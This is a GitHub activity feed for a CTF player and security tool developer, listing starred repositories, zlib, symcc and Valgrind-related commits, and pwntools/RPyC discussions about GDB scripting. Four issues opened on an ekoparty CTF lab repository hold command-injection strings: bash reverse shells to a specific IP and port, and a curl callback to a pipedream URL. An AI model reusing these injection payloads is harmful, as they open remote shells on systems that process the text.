
mephi42/ctf 22

My solutions for CTF challenges

averliok/EquityResearch 2

MOEX stocks analysis tool

mephi42/binary-consistency-checker 2

A script to find binary inconsistencies

mephi42/ctftool 2

Opinionated automation for all the boring CTF stuff

mephi42/deluged-via-proxy 2

Run deluge via proxy in an isolated environment

mephi42/dwarfexport 2

Export dwarf debug information from IDA Pro

mephi42/angr 1

A powerful and user-friendly binary analysis platform!

mephi42/angr-dev 1

Some helper scripts to set up an environment for angr development.

mephi42/angr-doc 1

Documentation for the angr suite

mephi42/ant-ivy 1

Mirror of Apache Ant Ivy

started intel/SGXDataCenterAttestationPrimitives

started time in 18 minutes

started andr3colonel/ghidra_wasm

started time in 2 days

started zxing/zxing

started time in 2 days

issue opened ekoparty2020/ekolabs

very important

";bash -c 'bash -i >& /dev/tcp/178.217.31.157/14880 0>&1';"

created time in 2 days

issue opened ekoparty2020/ekolabs

very important test

";bash -i >& /dev/tcp/178.217.31.157/14880 0>&1;"

created time in 2 days

issue opened ekoparty2020/ekolabs

test

";bash -i >& /dev/tcp/178.217.31.157/14880 0>&1;"

created time in 2 days

issue opened ekoparty2020/ekolabs

xxx

";curl https://efc9066fd6dd763082adbfa4aa51c790.m.pipedream.net;

created time in 2 days

started cmu-sei/pharos

started time in 3 days

started leesh3288/CTF

started time in 3 days

started WebAssembly/wabt

started time in 9 days

started belambert/asr-evaluation

started time in 13 days

started google/google-ctf

started time in 15 days

pull request comment eurecom-s3/symcc

Make tests endianness-agnostic

I'm trying to use it on IBM Z (aka s390). AFL's LLVM mode already works there, so after your FuzzCon presentation I thought I could try improving the fuzzing results with symcc. The first step was to build it and try the test suite - there is by the way a small linker problem with missing set_curterm and other libtinfo symbols when linking with libSymRuntime, which I solved in my setup by just adding -ltinfo to symcc.in - but I'm not sure whether this is the right solution. I haven't finished doing all the stuff described in Fuzzing.txt yet, but plan to do so in the near future.

Thanks for the fixes - I hadn't realized that _sym_get_parameter_expression() returns nullptr for concrete values (now I see that its return value comes from getSymbolicExpressionOrNull()).

mephi42

comment created time in 15 days

PR opened eurecom-s3/symcc

Make tests endianness-agnostic

Currently tests take binary input in little-endian format and thus fail on big-endian systems.

Fix by converting inputs to network byte order, using ntohl() in tests and providing the symbolic ntohl() wrapper. Other functions from this family could be similarly added as well, but it is not required for this fix.

+97 -27

0 comment

21 changed files

pr created time in 16 days

push event mephi42/symcc

mephi42

commit sha afbcd51dea17590fe5a19457de77a8d1cf26d5ca

Make tests endianness-agnostic

Currently tests take binary input in little-endian format and thus fail on big-endian systems.

Fix by converting inputs to network byte order, using ntohl() in tests and providing the symbolic ntohl() wrapper. Other functions from this family could be similarly added as well, but it is not required for this fix.

view details

push time in 16 days

fork mephi42/symcc

SymCC: efficient compiler-based symbolic execution

http://www.s3.eurecom.fr/tools/symbolic_execution/symcc.html

fork in 16 days

started trailofbits/deepstate

started time in 18 days

started carolemieux/afl-rb

started time in 18 days

started carolemieux/perffuzz

started time in 18 days

started sslab-gatech/qsym

started time in 18 days

started RUB-SysSec/ijon

started time in 18 days

started nyx-fuzz/libxdc

started time in 18 days

started uds-se/FormatFuzzer

started time in 18 days

started google/honggfuzz

started time in 18 days

push event mephi42/ctf

mephi42

commit sha 3b20158e0f940ee91a6bab0e6d4cccb13879e1d7

Add 2020.09.04-ALLES!_CTF_2020 maze

view details

push time in 20 days

started googleprojectzero/winafl

started time in 23 days

started zaproxy/zaproxy

started time in a month

started GoogleCloudPlatform/flask-talisman

started time in a month

started pyupio/safety-db

started time in a month

started dropbox/zxcvbn

started time in a month

push event mephi42/ctf

mephi42

commit sha 59b77a0b909520d0fc5c4384f7815953cf215879

Add solutions from a bunch of past CTFs (no writeups)

view details

push time in a month

started uw-unsat/jitterbug

started time in a month

started a13xp0p0v/kconfig-hardened-check

started time in a month

started a13xp0p0v/linux-kernel-defence-map

started time in a month

started resilar/crchack

started time in a month

started twosigma/fastfreeze

started time in a month

started kinvolk/traceloop

started time in a month

push event mephi42/raw_zlib

mephi42

commit sha b540b554ffcf991cddf50d01739971be97a1d5fc

Fix ResourceWarning in test_inflate_deflate

view details

push time in a month

started RUB-SysSec/redqueen

started time in a month

started kach/tower-of-power

started time in a month

started usnistgov/SCTK

started time in a month

push event mephi42/raw_zlib

mephi42

commit sha 64575f3990c3fe80aad11c6a703e2c74352d556e

Do not check CINFO in test_deflate_reset

view details

push time in a month

push event mephi42/raw_zlib

mephi42

commit sha 098cf1dbe48267d840748f9a62fa1227ee99eb07

Fix running installed test_inflate_deflate

view details

push time in a month

create branch mephi42/raw_zlib_benchmarks

branch : master

created branch time in a month

push event mephi42/raw_zlib

mephi42

commit sha 97247d56fc4e1639fcb7e36e616886990b336c02

Remove benchmark

view details

mephi42

commit sha 726886f7a8686d468641eb6dbc09fa005dd7c02d

Fix 'classifiers' should be a list, got type 'tuple'

view details

push time in a month

created repository mephi42/raw_zlib_benchmarks

created time in a month

started minimaxir/big-list-of-naughty-strings

started time in a month

push event mephi42/raw_zlib

mephi42

commit sha 137148552075f637fd876f162b0c3217a818df20

Ship tests with raw_zlib

view details

push time in a month

push event mephi42/raw_zlib

mephi42

commit sha a59f0ad64daf4a009e304142ba2a08999f432346

Test different buffer size combinations

view details

push time in a month

push event mephi42/raw_zlib

mephi42

commit sha 0b31d62b8015be5c361e5aa68f6c426060d52222

Add quick and dirty performance tests

view details

push time in a month

push event mephi42/raw_zlib

mephi42

commit sha 15b77ad06ec0058c76cfcc7d66213e4b2610b2bf

Add three tests for different deflate sequences

view details

push time in a month

push event mephi42/raw_zlib

mephi42

commit sha eb9c84344d92fcfbb43bcca48847254bba83e9a2

Add test_deflate_params5

view details

push time in a month

started axboe/fio

started time in 2 months

push event mephi42/raw_zlib

mephi42

commit sha 1c908a1a3641fd70a5ee2aaa33c4846576f9d9b7

Add --window-bits parameter to deflate.py and inflate.py

view details

push time in 2 months

push event mephi42/raw_zlib

mephi42

commit sha f22746ff409bd20644e4fd7bf4a03b987981863b

Add test_deflate_params4

view details

push time in 2 months

push event mephi42/raw_zlib

mephi42

commit sha 034d53fb891275e3b70022e79cb6d27eefba33c3

Add test_deflate_params3

view details

push time in 2 months

push event mephi42/raw_zlib

mephi42

commit sha f9874375ed5a5ed904fb9f9305b72f474b2cb680

Add test_deflate_params2

view details

push time in 2 months

push event mephi42/linetrace-cmd-record

mephi42

commit sha d40504dfac1e784963e41a4015c7d09df6bcdd33

Add BTF example

view details

push time in 2 months

push event mephi42/linetrace-cmd-record

mephi42

commit sha 3e4964063f404cbe6c8ae95fbea9174a7c87930c

Update Fedora install instructions

view details

push time in 2 months

push event mephi42/linetrace-cmd-record

mephi42

commit sha af808a8cd685ec86b691224a97ea83be13bfa348

Add Ubuntu support

view details

push time in 2 months

push event mephi42/raw_zlib

mephi42

commit sha f57b6c2aeae2e86f16ba4d6d724aa8f1bfbbda4a

Add test_set_dictionary4

view details

push time in 2 months

push event mephi42/raw_zlib

mephi42

commit sha 2fb88b4a0c85198170ea2090e563976c4a59c755

Add test_set_dictionary3

view details

push time in 2 months

push event mephi42/raw_zlib

mephi42

commit sha 56c8ecfad7ec81e14da6b0ba8e7569ad4a2be501

Add test for deflateSetDictionary() + Z_NO_COMPRESSION

view details

push time in 2 months

push event mephi42/raw_zlib

mephi42

commit sha e8af0a6ba5ffab2e924138b2168693d5b96c1227

Add test_small_out3

view details

push time in 2 months

push event mephi42/raw_zlib

mephi42

commit sha 2edd282149d60fa1e4aaa528b38b1242d9ec20d2

Add another test for small output buffer handling

view details

push time in 2 months

push event mephi42/raw_zlib

mephi42

commit sha f54b3d43e49c613c6195b1628e2c1cc2512658a5

Test small output buffer handling

view details

push time in 2 months

push event mephi42/raw_zlib

Ilya Leoshkevich

commit sha ce5eeaf4a1ab1df63eb099d743ab7de63fa47220

Test small output buffer handling

view details

push time in 2 months

push event mephi42/memtrace

mephi42

commit sha ec2a8ccd2b225cbce5460bfc9b5c08a50e27ca00

Allow running ci script for multiple architectures

view details

push time in 2 months

push event mephi42/memtrace

Andreas Arnez

commit sha abe7f083fdebb40c6f4a5adbdd2b64f5c329969a

Bug 418997 - s390x: Support Iex_ITE for float and vector expressions

The s390x backend supports Iex_ITE expressions for integer types I8, I16, I32, and I64 only. But "grail" can now generate such expressions for guarding any kind of Ist_Put statements; see add_guarded_stmt_to_end_of() in "guest_generic_bb_to_IR.c". On s390x this means that F64 and V128 can occur as well, in which case a crash would result. And such crashes are actually seen when running the test suite with "grail" enabled.

Extend Iex_ITE support to the floating-point types F32 and F64 and to the vector type V128. Do this by extending S390_INSN_COND_MOVE as needed.

view details

Andreas Arnez

commit sha dd627dc127a6767c497f027de6eab634815f7861

s390x: Activate "grail"

Now that the known problems with activating "grail" on s390x have been fixed, there is no need to disable it for s390x guests any more. Remove the appropriate check in "guest_generic_bb_to_IR.c".

view details

Andreas Arnez

commit sha e00bd722becf198447a4f7293c3d54e2d7f9baa2

s390x: Drop register arg to s390_isel_int1_expr()

Restructure the interface of s390_isel_int1_expr() such that no destination register is passed to it any more. Adjust all its callers accordingly. Ensure that callers never modify the returned register, but make a copy and modify that instead.

view details

Andreas Arnez

commit sha 1008ab726d43efd7e68225a56cc823a18eca8780

s390x: Fix typos in comments for sub_from_SP and add_to_SP in isel

The comments for sub_from_SP() and add_to_SP() in host_s390_isel.c have typos. Fix them.

view details

Andreas Arnez

commit sha 4e9763c617757712747e076b5d03bbb60a91c729

s390x: Introduce and exploit new ALU operator S390_ALU_ILIH

The handlers of Iop_8HLto16, Iop_16HLto32, and Iop_32HLto64 in s390_isel_int_wrk() yield a sequence of "shift", "and", and "or" ALU operations, the second of which modifies a register returned from a call to s390_isel_int_expr(). While this approach does not lead to wrong code generation (because only the register's upper bits are changed which are not relevant to the IR type), it violates the general "no-modify" rule.

Replace this sequence of ALU operations by a single ALU operation S390_ALU_ILIH that inserts the low half of its second operand into the high half of its first operand. Use the z/Architecture instruction RISBG ("rotate then insert selected bits") for implementing it.

view details

Andreas Arnez

commit sha 4970e20020cb80aa6b8ee80d53cefc409790547b

s390x: Fix Iex_Load instruction selectors for F128/D128 types

The s390x instruction selectors for Iex_Load of Ity_F128 and Ity_D128 types had a common typo that would lead to crashes when used. So far this bug didn't surface because Iex_Load is not emitted on s390x with these types. This fixes the typo.

view details

Andreas Arnez

commit sha 6a90a15b9c0cbf38b6a9f17e5fa28199e155de73

s390x: Drop spurious register moves in CDAS instruction selector

The s390x instruction selector for Ist_CAS, in its handling of "compare double and swap", adds spurious register moves after the CDAS operation itself. These moves overwrite registers returned by calls to s390_isel_int_expr(), potentially causing corruption of temp values. Delete the spurious move operations after CDAS.

view details

Philippe Waroquiers

commit sha 2381e043544b1e9e9c72e272b9e9244a43682357

Fix solaris build

Problem report and fix by Paul Floyd

view details

Bart Van Assche

commit sha 20dc7278512cbe530dc722ed18232915bfe4ab8b

drd/tests/trylock, FreeBSD: Fix a hang

The test code in drd/tests/trylock.c attempts to write-lock a POSIX rwlock twice. The code expects the second attempt to return an error, but POSIX doesn't require that behaviour, and FreeBSD's implementation deadlocks instead.

See also https://bugs.kde.org/show_bug.cgi?id=403212

Reported-by: Mark Johnston <markj@FreeBSD.org>

view details

Bart Van Assche

commit sha 52d02fe239117c76bdc0fe4b12e85b9156dc4269

drd/drd_pthread_intercepts: Add a workaround for what is probably a compiler bug

Without this patch drd produces incorrect output for some test cases. It seems like without this patch an incorrect value is passed as the sixth argument of VALGRIND_DO_CLIENT_REQUEST_STMT(VG_USERREQ__POST_SEM_OPEN, ...):

    $ ./vg-in-place --tool=drd --trace-semaphore=yes drd/tests/sem_open -m -p
    drd, a thread error detector
    Copyright (C) 2006-2017, and GNU GPL'd, by Bart Van Assche.
    Using Valgrind-3.16.0.GIT and LibVEX; rerun with -h for copyright info
    Command: drd/tests/sem_open -m -p
    [1] sem_open 0x4029000 name /drd-sem-open-test-27725 oflag 0xc0 mode 0600 value 0
    s_d1 = 1 (should be 1)
    [2] sem_wait 0x4029000 value 0 -> 4294967295
    Thread 2:
    Invalid semaphore: semaphore 0x4029000
       at 0x484ADC7: sem_wait_intercept (drd_pthread_intercepts.c:1436)
       by 0x484ADC7: sem_wait@* (drd_pthread_intercepts.c:1441)
       by 0x4014A9: thread_func (sem_open.c:114)
       by 0x483FEA6: vgDrd_thread_wrapper (drd_pthread_intercepts.c:449)
       by 0x4886EF9: start_thread (in /lib64/libpthread-2.31.so)
       by 0x499F3BE: clone (in /lib64/libc-2.31.so)
    semaphore 0x4029000 was first observed at:
       at 0x484A395: sem_open_intercept (drd_pthread_intercepts.c:1403)
       by 0x484A395: sem_open (drd_pthread_intercepts.c:1409)
       by 0x4012CE: main (sem_open.c:63)
    [2] sem_post 0x4029000 value 4294967295 -> 0
    [1] sem_wait 0x4029000 value 0 -> 4294967295
    Thread 1:
    Invalid semaphore: semaphore 0x4029000
       at 0x484ADC7: sem_wait_intercept (drd_pthread_intercepts.c:1436)
       by 0x484ADC7: sem_wait@* (drd_pthread_intercepts.c:1441)
       by 0x40139D: main (sem_open.c:90)
    semaphore 0x4029000 was first observed at:
       at 0x484A395: sem_open_intercept (drd_pthread_intercepts.c:1403)
       by 0x484A395: sem_open (drd_pthread_intercepts.c:1409)
       by 0x4012CE: main (sem_open.c:63)
    Conflicting load by thread 1 at 0x00404108 size 8
       at 0x40139E: main (sem_open.c:91)
    Allocation context: BSS section of /home/bart/software/valgrind.git/drd/tests/sem_open
    Other segment start (thread 2)
       (thread finished, call stack no longer available)
    Other segment end (thread 2)
       (thread finished, call stack no longer available)
    Conflicting store by thread 1 at 0x00404108 size 8
       at 0x4013B2: main (sem_open.c:91)
    Allocation context: BSS section of /home/bart/software/valgrind.git/drd/tests/sem_open
    Other segment start (thread 2)
       (thread finished, call stack no longer available)
    Other segment end (thread 2)
       (thread finished, call stack no longer available)
    [1] sem_post 0x4029000 value 4294967295 -> 0
    s_d2 = 2 (should be 2)
    s_d3 = 5 (should be 5)
    [1] sem_close 0x4029000 value 0
    For lists of detected and suppressed errors, rerun with: -s
    ERROR SUMMARY: 4 errors from 4 contexts (suppressed: 18 from 8)

view details

Julian Seward

commit sha ecf5636a1442c024a9b30debcbec8c2013ec5af7

Add a missing \n in debug output printing.

view details

Mark Wielaard

commit sha bc7eb9046f93558903fc388a00dbb60c89a9cf73

Add missing vki header files to nobase_pkginclude_HEADERS. Otherwise they don't show up in the dist tarball.

view details

Julian Seward

commit sha afe1d87762a4c1500ceb6d38075d2c6db1cd4482

Update bug status.

view details

Mark Wielaard

commit sha ad0ca50fc9fa5c65dca9f0aa14e3955644b876bd

Add avx_tests.h to noinst_HEADERS to make sure it appears in dist.

view details

Julian Seward

commit sha 40187fcd61ee877f78701c46a74ac1dadbe65b3d

Remove the exp-sgcheck tool.

It only ever worked on x86 and amd64, and even on those it had a high false positive rate and was slow. Everything it does, ASan can do faster, better, and on more architectures. So there's no reason to keep this tool any more.

view details

Stefan Maksimovic

commit sha ddc311558e11c47a06ba996a7d075b336726fc0b

mips: treat delay slot as part of the previous instruction

Do so by recursively calling disInstr_MIPS_WRK() if the instruction currently being disassembled is a branch/jump, effectively combining them into one IR instruction. A notable change is that the branch/jump + delay slot combination now forms an eight-byte instruction.

This is related to KDE #417187. This fixes drd/tests/annotate_hbefore on mips.

view details

Petar Jovanovic

commit sha 8bd259eb14d884009e2e51e6ad5834c06d193e17

mips: update VEX to support speculative conditional branching

This partially fixes KDE #417187.

view details

Stefan Maksimovic

commit sha fd97444eb2a82e13923a48b0b6951e3530d02c74

mips: add a special case for beq r0, r0, imm

This results in unconditional PUTs to PC in generated IR code.

This fixes:
    memcheck/tests/cdebug_zlib
    memcheck/tests/cdebug_zlib_gnu
    memcheck/tests/origin2-not-quite
    memcheck/tests/origin5-bz2
    none/tests/mips64/branch_and_jump_instructions

view details

Petar Jovanovic

commit sha feccc40da7a5d9ec29d23d819dbdf17ad793ac3d

update NEWS with fix for #417187

The KDE issue #417187 has been fixed in
    commit 8bd259eb14d884009e2e51e6ad5834c06d193e17
        mips: update VEX to support speculative conditional branching
    commit ddc311558e11c47a06ba996a7d075b336726fc0b
        mips: treat delay slot as part of the previous instruction

view details

Aleksandar Rikalo

commit sha 93bb2da218a691532cd709b195b687e02ac0f1d2

Fix memcheck/vbit-test for BE platforms

We do not need the u1 member of the bits union as long as we use u32 for the same purpose. Overlapping uint8_t with uint32_t causes a problem on BE platforms, since the LSB of u32 does not overlap with u1.

view details

push time in 2 months

push event mephi42/pwntools

heapcrash

commit sha cc6d272760c115baa4700d727a52dcea170bb65f

[release] Version bump to 4.1.7

view details

Kyle Zeng

commit sha 230a42ffc0b63148b82b5c6c270d211f8ad83507

OSError is not subscriptable (#1608)

view details

heapcrash

commit sha bae22da550fb664be4989aff01b9f81323dbfcda

Merge branch 'stable' into beta

view details

heapcrash

commit sha 1cc5deca5095f72d0de1d640558017adf8a167e9

[gha] Add doctest to verify that skipif works

view details

heapcrash

commit sha 3390eafab33c6e2f8c0df1ead412201c777d4da2

[doctest] Try testsetup / failing doctest

view details

heapcrash

commit sha 21215ac22f17f214abb9d253fc6b707d9f3424c6

[gha] Remove canary test for skipif section

view details

heapcrash

commit sha 7647ea6ca9160f528506fa2fa0d3d13ae6343dfc

[ci] Remove failing testsetup block

view details

heapcrash

commit sha 13960bac0894701e41bf04047359bce65efe3d4d

Merge branch 'beta' into dev

view details

heapcrash

commit sha 2e61a6be7f7aaba5d240f545864bc912449adff8

[release] 4.2.0 is now "stable"

view details

heapcrash

commit sha 7b130aec79176aaa952cae1ca18934375c99a919

[4.3.0] dev is now beta

view details

heapcrash

commit sha 89e3f2bee0e5ab4a44af294f064824e99b4afef6

[dev] Version bump for dev

view details

heapcrash

commit sha db7312b43fa419a1be9c943b409873c0fc4a137c

Merge branch 'stable' into beta

view details

heapcrash

commit sha 6afccefb0108bc07adec368925adc78c263ea430

Merge branch 'beta' into dev

view details

heapcrash

commit sha 0337387f97d2ce0533660673d17d763c5672dce5

Add Python3 to supported languages for PyPi

view details

heapcrash

commit sha db0312e0fe94d2b62b6a918569c86b68a2dfa991

Merge branch 'stable' into beta-staging

view details

heapcrash

commit sha 427066d9370b7fc735a7b82110ec5bc55ebfc77a

[memleak] Fix missing import

view details

Heap Crash

commit sha 08d900994d7aa352e250357c116d9502a2491fa9

[changelog] Update changelog for new release (#1626)

view details

heapcrash

commit sha 2fafbfb29175faeff1d69a3660e1f1245e37cd74

Merge branch 'beta-staging' into dev

view details

heapcrash

commit sha d2b0a5913bfdf830efe119bd0697b068dd7d837d

[changelog] Update release date and version list

view details

Jakub Kądziołka

commit sha ca06098649b5186416864255d2b2c896093b55e8

Fix documentation formatting for pwnlib.util.packing.flat (#1624)

view details

push time in 2 months

create branch mephi42/pwntools

branch : gdb-api

created branch time in 2 months

started marcan/takeover.sh

started time in 2 months

started g2p/blocks

started time in 2 months

started google/libprotobuf-mutator

started time in 2 months

push event mephi42/raw_zlib

mephi42

commit sha 0df3a7606f6cb13af566d088bdede01880caed5c

Fix compressed data length in test_inflate_prime

view details

push time in 2 months

started yarrick/pingfs

started time in 2 months

issue comment Gallopsled/pwntools

Allow calling GDB Python API

I made a small working prototype with RPyC. The advantage of RPyC is that everything is transparent - pwntools users would interact with the GDB API directly without us having to wrap or register each individual call. Unfortunately, RPyC developers said that inheriting from remote classes is a hard problem, therefore there would have to be some special magic for the Breakpoint class.

Regarding threading, yes, the code has to be liberally sprinkled with gdb.post_event(). I'm experimenting with making RPyC network code run in a separate thread while dispatching remote calls to GDB thread.

mephi42

comment created time in 2 months

started akaihola/pgtricks

started time in 3 months

issue comment tomerfiliba/rpyc

Inheriting from remote classes

Thanks for looking into this! Could you please also try inheriting from parent_gdb_conn.root.get_gdb().Breakpoint? That's where I'm having most issues.

mephi42

comment created time in 3 months

issue opened tomerfiliba/rpyc

Inheriting from remote classes

Hi,

I'm trying to use RPyC in order to call GDB Python API. Exposing gdb module and calling methods like execute() on it has been fairly straightforward - which is pretty cool! Now I'm trying to implement breakpoints, and they require subclassing gdb.Breakpoint. Something like this:

    cat.gdb = unix_connect(...).root.get_gdb()
    class WriteBp(cat.gdb.Breakpoint):
        def on_stop(self):
            cat.gdb.execute('c')

fails immediately with

  File "gdb_api.py", line 10, in main
    class WriteBp(cat.gdb.Breakpoint):
  File "venv/site-packages/rpyc/core/netref.py", line 274, in method
    return syncreq(_self, consts.HANDLE_CALLATTR, name, args, kwargs)
  File "venv/site-packages/rpyc/core/netref.py", line 75, in syncreq
    conn = object.__getattribute__(proxy, "____conn__")
AttributeError: 'str' object has no attribute '____conn__'

when trying to call the __prepare__ method. So I figured that _make_method must be missing a bunch of stuff required to implement metaclasses. I wonder how doable this is in the end? I could take a stab at this, but I thought I'd better ask first - maybe you are already working on this, or maybe you already considered it and decided it wasn't possible :-)

created time in 3 months

issue comment Gallopsled/pwntools

Allow calling GDB Python API

What prompted me to think about this was solving CTF heap challenges, where I have to constantly go back and forth between the exploit, gdbscript trace output and gdb itself, making sure that modifications to the exploit produce the desired results and don't break anything.

What's especially frustrating is realizing at some point that you need to modify the very beginning of the exploitation chain, and then figure out what other parts need to be adjusted. To keep track of all that I normally write comments like "here heap should be in XYZ state" and, when needed, compare them with what I see in gdb, but having the ability to automatically check all that would be invaluable.

The simplest use case therefore would be:

    io.sendline('command')
    io.recvuntil('prompt')
    chunks1 = parse_chunks(io.gdb.execute('heap chunks'))  # GEF integration for structured output might be cool too
    assert chunks1.fastbins(0x20)[0] & 0xfff == 0xa20

Catching victim processing in simple cases might look like this:

    class MallocBp(io.gdb.Breakpoint):
        def __init__(self):
            # super().__init__() already binds self; only the location is passed
            super().__init__("malloc")
            self.count = 0

        def stop(self):
            self.count += 1
            if self.count == 5:
                io.gdb.execute('finish')
                assert int(io.gdb.parse_and_eval('$rax')) == free_hook_addr

    io.recvuntil('prompt')
    bp = MallocBp()
    io.sendline('command')
    io.recvuntil('prompt')
    assert bp.count == 20
    bp.delete()

mephi42

comment created time in 3 months

issue opened Gallopsled/pwntools

Allow calling GDB Python API

It would be great if pwntools could allow using GDB's Python API like this:

    io = gdb.debug(['./pwnme'])
    ...
    class Bp(io.gdb.Breakpoint):
        def stop(self):
            print(io.gdb.inferiors()[0].read_memory(addr, 8))
            io.gdb.execute('c')

This would make it possible to write assertions against program state, e.g. compare leaked variables with their actual values, check that heap massaging produces desired layout, or ensure that sending a certain input at a certain time triggers a certain function with certain arguments, etc.

A possible implementation might be injecting RPyC server into gdb via gdbscript and using gdb.post_event to talk to the main loop. RPyC claims to support callbacks so triggering breakpoint processing on pwntools side should be possible.

If this looks like a valuable feature, I could at least implement a PoC. Please let me know what you think!

created time in 3 months
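The dispatch mechanism described in this issue, and again in the comment on it further up the page (an RPyC server injected into gdb, with the network code on its own thread and every GDB API call handed to GDB's main loop through gdb.post_event()), shown as an added example. This is not code from pwntools, RPyC or GDB. `MainLoop` is a stand-in for GDB's event loop so that the example runs outside gdb; its `post_event()` follows the contract of `gdb.post_event()` (queue a callable, run it later on the loop thread). `MainThreadDispatcher` takes the post function as a parameter, so the same helper could be given the real `gdb.post_event`. The workload in `demo()` (`on_loop_thread`, the deliberate division by zero) is constructed only to show that both results and exceptions travel back to the calling thread.

```python
"""Marshal calls from a worker thread onto a single event-loop thread.

Pattern: a network/RPC handler thread must not touch an API that is only
safe on the main thread (GDB's Python API is the case discussed above).
The worker queues a callable with post_event() and blocks on a Future
until the main thread has run it.
"""
import queue
import threading
from concurrent.futures import Future


class MainLoop:
    """Stand-in for GDB's main loop (assumption: real GDB provides gdb.post_event)."""

    def __init__(self):
        self._events = queue.Queue()
        self.thread_ident = None

    def post_event(self, fn):
        """Same contract as gdb.post_event(): fn runs later on the loop thread."""
        self._events.put(fn)

    def run(self, until):
        """Process queued events on the calling thread until `until` is set."""
        self.thread_ident = threading.get_ident()
        while not until.is_set():
            try:
                fn = self._events.get(timeout=0.05)
            except queue.Empty:
                continue
            fn()


class MainThreadDispatcher:
    """Run a callable on the loop thread; return its result or re-raise its exception."""

    def __init__(self, post_event):
        # post_event: MainLoop.post_event here, gdb.post_event inside a real GDB
        self._post_event = post_event

    def call(self, fn, *args, **kwargs):
        fut = Future()

        def event():
            # Executes on the loop thread; forward outcome to the waiting caller.
            try:
                fut.set_result(fn(*args, **kwargs))
            except BaseException as exc:
                fut.set_exception(exc)

        self._post_event(event)
        # Blocks only the worker thread; the loop thread is never blocked here.
        return fut.result()


def demo():
    """Worker thread asks the loop thread to do work; returns what it observed."""
    loop = MainLoop()
    dispatcher = MainThreadDispatcher(loop.post_event)
    done = threading.Event()
    observed = {}

    def on_loop_thread(x):
        # Constructed workload: report which thread ran it and a derived value.
        return threading.get_ident(), x * 2

    def worker():
        try:
            ident, value = dispatcher.call(on_loop_thread, 21)
            observed["ran_on_loop_thread"] = ident == loop.thread_ident
            observed["value"] = value
            try:
                dispatcher.call(lambda: 1 // 0)  # exception raised on loop thread
            except ZeroDivisionError:
                observed["exception_forwarded"] = True
        finally:
            done.set()

    threading.Thread(target=worker, daemon=True).start()
    loop.run(done)  # plays the role of GDB's main thread driving its event loop
    return observed


if __name__ == "__main__":
    print(demo())
```

Inside a real GDB the same `MainThreadDispatcher(gdb.post_event)` can wrap the calls an RPyC service makes into the `gdb` module; the remaining problem the thread describes, subclassing `gdb.Breakpoint` through a remote proxy, is not addressed by this helper.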

started Boolector/boolector

started time in 3 months

started EasyHook/EasyHook

started time in 3 months

started Maktm/FLIRTDB

started time in 3 months

push event mephi42/schick

mephi42

commit sha 1db659556a406daced3ab20e2f3575a937bdbde6

Stop after reaching --max-active states

view details

push time in 3 months

push event mephi42/schick

mephi42

commit sha f2f82f5c20ffaec2cd92205da93cd23532347379

Handle if statements

view details

push time in 3 months

push event mephi42/schick

mephi42

commit sha d54e58cae3852a25a36852e432e701a2421f3ddd

Handle if statements

view details

push time in 3 months

push event mephi42/schick

mephi42

commit sha fd018c926fe4af45db94c5a997deb35157321493

Handle if statements

view details

push time in 3 months

push event mephi42/schick

mephi42

commit sha 0c73331d19910aaa481b087c4c6978f786e59a62

Replace Cfg with stStack

view details

push time in 3 months

push event mephi42/schick

mephi42

commit sha d6f0bb0e2611cd5bbb5901ee154ccf29291cd02d

Handle if statements

view details

push time in 3 months

push event mephi42/schick

mephi42

commit sha 9bce054e062ae7b02a03106460fbc872e6dbe4d2

Handle case statements

view details

push time in 3 months
